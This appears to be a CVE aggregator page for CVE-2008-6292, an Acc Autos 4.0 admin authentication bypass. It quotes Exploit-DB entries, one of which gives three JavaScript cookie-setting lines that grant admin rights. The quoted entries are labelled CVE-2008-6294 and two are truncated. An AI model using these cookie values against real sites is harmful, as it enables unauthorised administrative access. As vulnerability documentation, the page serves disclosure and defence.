CVE-2008-6292
published 2009-02-26CVE-2008-6292: Acc Autos 4.0 allows remote attackers to bypass authentication and gain administrative access by setting the (1) username_cookie to "admin," (2) right_cookie…
PriorityP355high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.74%
84.3th percentile
Acc Autos 4.0 allows remote attackers to bypass authentication and gain administrative access by setting the (1) username_cookie to "admin," (2) right_cookie to "1," and (3) id_cookie to "1."
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| accscripts | acc_autos | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Acc Autos 4.0 - Insecure Cookie Handling
exploitdb·2008-11-03
CVE-2008-6294 Acc Autos 4.0 - Insecure Cookie Handling
Acc Autos 4.0 - Insecure Cookie Handling
---
Autore: x0r - Road Crew - Evolution Team
Cms: Acc Autos v4.0
Bug: Insecure Cookie Handling
Site: http://pro7.altervista.org/v2/
Exploit:
[+]javascript:document.cookie="username_cookie=admin";
[+]javascript:document.cookie="right_cookie=1";
[+]javascript:document.cookie="id_cookie=1";
Live Demo:
http://www.accscripts.com/autos/demo/admin/
Greetz: 8\10\2008..Il Sogni Diventa Realtà ...Bimb4 Ti AmO.
# milw0rm.com [2008-11-03]
Exploit-DB
Acc Real Estate 4.0 - Insecure Cookie Handling
exploitdb·2008-11-03
CVE-2008-6294 Acc Real Estate 4.0 - Insecure Cookie Handling
Acc Real Estate 4.0 - Insecure Cookie Handling
---
###########################################################################
______ __ __ ______ __ ______
/ ____/___ \ \/ / / ____/___ ____/ /__ __________ /_ __/__ ____ _____ ___
/ __/ / __ `/\ / / / / __ \/ __ / _ \/ ___/ ___/ / / / _ \/ __ `/ __ `__ \
/ /___/ /_/ / / / / /___/ /_/ / /_/ / __/ / (__ ) / / / __/ /_/ / / / / / /
/_____/\__, / /_/ \____/\____/\__,_/\___/_/ /____/ /_/ \___/\__,_/_/ /_/ /_/
/____/
# [~] Discovered by : Hakxer
# [~] Type Gap : Acc Real Estate v4.0 Insecure Cookie Handling
# [~] Script : http://www.accscripts.com/realestate/admin-area-specifications.html
# [~] Greetz : Allah .. " Allah AkBar .. " Big Hacking SoOoN
##########################################################################
Bug In : /admin/Ind
Exploit-DB
Acc Statistics 1.1 - Insecure Cookie Handling
exploitdb·2008-11-03
CVE-2008-6294 Acc Statistics 1.1 - Insecure Cookie Handling
Acc Statistics 1.1 - Insecure Cookie Handling
---
###########################################################################
______ __ __ ______ __ ______
/ ____/___ \ \/ / / ____/___ ____/ /__ __________ /_ __/__ ____ _____ ___
/ __/ / __ `/\ / / / / __ \/ __ / _ \/ ___/ ___/ / / / _ \/ __ `/ __ `__ \
/ /___/ /_/ / / / / /___/ /_/ / /_/ / __/ / (__ ) / / / __/ /_/ / / / / / /
/_____/\__, / /_/ \____/\____/\__,_/\___/_/ /____/ /_/ \___/\__,_/_/ /_/ /_/
/____/
# [~] Discovered by : Hakxer
# [~] Type Gap : AccStatistics v1.1 Insecure Cookie Handling
# [~] Script : http://www.accscripts.com/accstatistics.html
# [~] Greetz : Allah .. " Allah AkBar .. " Big Hacking SoOoN
##########################################################################
Bug In : /admin/Index.php
PoC : javascript:d
No writeups or analysis indexed.
http://secunia.com/advisories/32517http://www.securityfocus.com/bid/32083https://exchange.xforce.ibmcloud.com/vulnerabilities/46287https://www.exploit-db.com/exploits/6968http://secunia.com/advisories/32517http://www.securityfocus.com/bid/32083https://exchange.xforce.ibmcloud.com/vulnerabilities/46287https://www.exploit-db.com/exploits/6968
2009-02-26
Published